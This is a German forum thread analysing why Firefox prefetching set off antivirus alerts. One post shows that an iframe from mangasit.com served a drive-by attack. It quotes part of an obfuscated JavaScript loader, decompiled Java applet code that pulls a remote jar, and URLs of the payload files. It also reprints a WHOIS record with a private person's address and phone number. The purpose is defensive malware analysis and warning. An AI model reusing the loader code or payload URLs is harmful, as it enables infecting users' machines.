FF ruft im Hintergrund virenbefallene Seite auf

Wenn das Problem nur über das Prefetching auftritt, wie Nighthawk und Roady berichten, dann ist zu vermuten, dass der auslösende iframe in einer anderen Seite steht, als die wir aktuell geprüft haben. Insofern muss es nicht das mangasit sein. Das kann auch über irgendwelche Google-Ads oder sonst extern verlinkte Seiten passieren. Daher vermute ich auch, dass thomashawk nicht verseucht ist, sondern eine Seite die von dort verlinkt ist (und da Werbung z.B. rotiert, kann es auch dazu führen, dass der Alarm nur sporadisch anschlägt). Zumindest würde das erklären, warum bei Firefox Alarm geschlagen wird, während Opera unbehelligt bleibt.

Wenn es wirklich über Prefetching zu dem Vorfall kommt, kann man aber Entwarnung geben. Die Seiten die Firefox vorab schon mal herunterlädt, landen direkt im Cache. Der ist verschlossen und die HTML-Seite wird auch nicht geparset, also gelesen. Die Seite wird erst dann aus dem Cache geladen und ausgeführt/angezeigt, wenn der Benutzer die Seite regulär aufruft. Erst dann kann auch Schadecode, sofern vorhanden, ausgeführt werden. Einzig was nervt, ist wahrscheinlich das Popup von Avast! Damit muss man entweder leben, oder das Prefetching deaktivieren.

Die Meldung dürfte sich durchaus auf den eingebundenen IFrame von mangasit.com beziehen. Dort erhalte ich folgenden obfuskierten JS-Code:

<script language="JavaScript" type="text/javascript">this.uP='';var wPM;var fW;if(fW!='nSZ' && fW!='lA'){fW='nSZ'};var aN;if(aN!='vS' && aN!='eBG'){aN='vS'};wPM="37333337343d3233781b072911097968203d287a276434206d0e176b176c7f1a6f176603387c370f6b312d3c21782c3d160f0f1a3248362a382126332324133632246c3a2a39263533042b1f373d2b037e643f2324273907476a7e322719"+"121401180b4f2c736b7544322f2c2d3f1f2d0873602e26207d70793c742a3a761c2e7d336b67282f2d0313051c1f7e7d3226731a3f2f0b313e0b241f6f7c3238292a3a737e5e7b4563626829353b0707030f076e722a2426002770393a23"+"2f056429276f6d2c3c362f717b7f756...
(gekürzt)

Schon allein die Verwendung solcher Verschleierungen führt i.d.R. zur Erkennung durch Scanner, wenn auch oftmals nur generisch und auf Verdacht. In dem Fall aber erzeugt der Code mindestens ein Java-Applet:

<applet code="evilTook.class" id="youAsIsnt" name="youAsIsnt" height="1" width="1"></applet>

Die class-Datei findet sich natürlich auch:
http://mangasit.com/lib/evilTook.class

Durch einen Decompiler gejagt und gekürzt:

void fhx3oCpL()
    {
        try
        {
            URL url = getCodeBase();
            String s = url.toString();
            String s1 = (new StringBuilder()).append("jar:").append(s).append("thatGalleyComes.php!/").toString();
            ClassLoader classloader = getClass().getClassLoader();
            sxWldX2S = URLClassLoader.newInstance(new URL[] {
                new URL(s1)
            }, classloader);
        }
        catch(Exception exception) { }
    }


    public void init()
    {
        cR9I4SMHF(kpclMGq4M, 80);
        fhx3oCpL();
        guaCyQuh = 5000;
        aBi4Eci89(guaCyQuh);
        pClpZ7o44(guaCyQuh);
        Class class1;
        try
        {
            class1 = Class.forName("x", true, sxWldX2S);
        }
        catch(Exception exception)
        {
            qLXm3MDP8z(guaCyQuh);
        }
    }


    URLClassLoader sxWldX2S;
    Inflater tab[];
    int guaCyQuh;
    static String kpclMGq4M = "\u9C60\350\000\u5D00\uED83\uB807\uC56B\u7E9E\u4CB9\004\u3100\u0D44\u831A\u04E9\uF775\uF497\u1A5E\uC068\u7EAE\uC56B\u72E6\u85E0\uF592\uD91B\uF533\uCD33\u7775\u85E0\uF3AA\uB92B\u2615\u2D57\u7D15\uC56B\uEB13\uC6DA\u7E9E

Die über jar: geladenen Datei ist:
http://mangasit.com/lib/thatGalleyComes.php

Für diese gilt:
http://www.virustotal.com/analisis/4084d…a6e9-1262769915

Aus den Beobachtungen ergibt sich hier als Fazit:
Es handelt sich hier nicht um ein False-Positive, sondern um einen realen Angriff. Sowohl die Webpräsenzen thomashawk.com als auch mangasit.com sind als kompromittiert anzusehen (vgl. dazu http://www.google.com/safebrowsing/d…m/lib/index.php und das Einbinden von mangasit.com via IFrame auf thomashawk.com). Wie die Erkennung von einzelnen Scannern funktioniert, kann hier auch unterschiedlich sein, spielt bei der Betrachtung aber eine untergeordnete Rolle.
Zu Untersuchen bliebe natürlich, warum das Fx-Profil die Seite aufgerufen hat. Da kein Interesse mehr an einer Untersuchung besteht, kann man das an der Stelle abbrechen. Ich vermute aber, dass das Profil nicht ausreichend bereinigt wurde.

Zitat von Brummelchen

Was mir allerdings persönlich auffällt - wie kann man als Webseitengestalterin auf einem
unsicheren Browser aufbauen? Eigentlich sollte es u.a. Aufgabe sein, auf solche Misstände
hinzuweisen und nicht bewusst auf solche Sicherheitslücken hinzuarbeiten...!?
[...]
Webmaster, die so ein Element noch nutzen, gehören mMn erschlagen.

Auch wenn man zwischen Arbeit und persönlicher Nutzung unterscheiden muss, da beim Webdesign durchaus auch veraltete Browser berücksichtigt werden, so stellte Milla dies hier als Problem bei der privaten Nutzung eines alten Fx dar. Und da ist die Kritik von Brummelchen durchaus in der Sache richtig. Wenn man es nicht schafft den Fx 3 zum Laufen zu bekommen (Gründe seien einmal dahingestellt), dann sollte man eben einen anderen Browser verwenden. Eine unsichere, alte Version ist an der Stelle keine Option und von einem Webdesigner erwarte ich persönlich so viel Vernunft! Schließlich sind diese auch für die Sicherheit von Webanwendungen zuständig und da kommen mir persönlich Zweifel an der fachlichen Eignung, wenn man privat derart schludert.

Zitat von NightHawk56

Ein weiterer Hinweis: suche ich mit http://ixquick.com/ nach "thomashawk" kommt von avast trotz erlaubtem Prefetching keine Warnung.

Da ixquicks keine prefetch-Links verwendet wie Google, wird es da auch nicht zu einer solchen Meldung kommen. Siehe dazu den Beitrag von .Ulli weiter oben.

Quelle: Brummelchen

Zitat von Brummelchen

Das iframe steht immer noch auf mangasit - immer noch ohne Inhalt.
[...]
Firefox möchte Java haben, nutze ich nicht, ist nicht mal installiert.

Dann scheint mir aber doch ein Inhalt dort gewesen zu sein. Oder wieso sollte Firefox denn sonst dort Java wollen?

Durchaus nicht ungewöhnlich, dass der empfangene Datenstrom in solchen Fällen nicht stabil ist. Ist von außen auch nicht immer ersichtlich auf welchen Daten dies basiert.
Begegnet sind mir schon Angriffsversuche, die nur einmal pro IP gestartet wurden (in einem gewissen Zeitraum). Oder auch Unterscheidungen basierend auf den HTTP-Headern (verschieden Codes je nach Browser). Im Detail habe ich mir das in dem Fall nicht angesehen, da bereits der erste Versuch ein Treffer war.

Zitat

In dem Fall aber erzeugt der Code mindestens ein Java-Applet

Ergänzung dazu:
Das Skript scheint noch mehr Angriffsvektoren zu nutzen.
h**p://mangasit .com/lib/normalWill.pdf Virustotal
h**p://mangasit .com/lib/moreYou.swf Virustotal
Auch für den IE scheint etwas dabei zu sein. Der Code selbst lässt auf ein entsprechendes Kit schließen.

Nochmals zur deutlichen Warnung! Die Dateien sollten keinesfalls mit den vorgesehen Anwendungen geöffnet werden. Es ist durchaus möglich, dass hier 0day-Exploits zur Anwendung kommen oder vorhandene Scanner noch keine Signaturen dafür haben.

Meldung an den Admin von thomashawk.com habe ich abgesetzt. Eine Meldung bzgl. mangasit.com erscheint mir wenig sinnvoll *eg* (Ergänzung: dem Registrar habe ich trotzdem geschrieben, allerdings sind das auch Russen, insofern...)

Zitat

Registrant:
Ekaterina Ermakova
Email: ermakova@gmail.com
Organization: Private person
Address: Rososhanova, 2, 17
City: moskva
State: moskva
ZIP: 118667
Country: RU
Phone: +7.4958127705
Administrative Contact:
Ekaterina Ermakova
Email: ermakova@gmail.com
Organization: Private person
Address: Rososhanova, 2, 17
City: moskva
State: moskva
ZIP: 118667
Country: RU
Phone: +7.4958127705
Technical Contact:
Ekaterina Ermakova
Email: ermakova@gmail.com
Organization: Private person
Address: Rososhanova, 2, 17
City: moskva
State: moskva
ZIP: 118667
Country: RU
Phone: +7.4958127705
Billing Contact:
Ekaterina Ermakova
Email: ermakova@gmail.com
Organization: Private person
Address: Rososhanova, 2, 17
City: moskva
State: moskva
ZIP: 118667
Country: RU
Phone: +7.4958127705

Alles anzeigen

Update bzgl. thomashawk.com:
Die Seite ist nun (16:45 Uhr) offline.

Zitat von Wawuschel

@boardraider
magst du vllt. die beiden mangasit-Links oben so gestalten das sie nicht direkt anklickbar sind.

Erledigt.

@Wawuschel

Zitat

magst du vllt. die beiden mangasit-Links oben so gestalten das sie nicht direkt anklickbar sind.

Das mache ich aus Prinzip nicht. Ich habe ausdrücklich eine Warnung formuliert und auch aus dem Kontext sollte es für jeden ersichtlich sein, dass man da nicht einfach drauf klicken sollte.

Road-Runner
Wenn du meine Postings editierst, dann schreibe bitte einen Vermerk dazu!

Zitat von boardraider

@Wawuschel

Das mache ich aus Prinzip nicht. Ich habe ausdrücklich eine Warnung formuliert und auch aus dem Kontext sollte es für jeden ersichtlich sein, dass man da nicht einfach drauf klicken sollte.

Warnung hin oder her, solche Links gehören entschärft.

Zitat

Road-Runner
Wenn du meine Postings editierst, dann schreibe bitte einen Vermerk dazu!

Siehe meinen Beitrag über Deinem.

Zitat

solche Links gehören entschärft.

Warum soll sich jeder Interessierte umständlichen Handgriffen aussetzen? Ich sehe da 0,0 Veranlassung.

Zitat

Siehe meinen Beitrag über Deinem.

So etwas wird allzu leicht übersehen. Ich bevorzuge einen Vermerk im Beitrag selbst. So viel Höflichkeit und Offenheit darf es schon sein.

Zitat von boardraider

Update bzgl. thomashawk.com:
Die Seite ist nun (16:45 Uhr) offline.

http://downforeveryoneorjustme.com/thomashawk.com :-??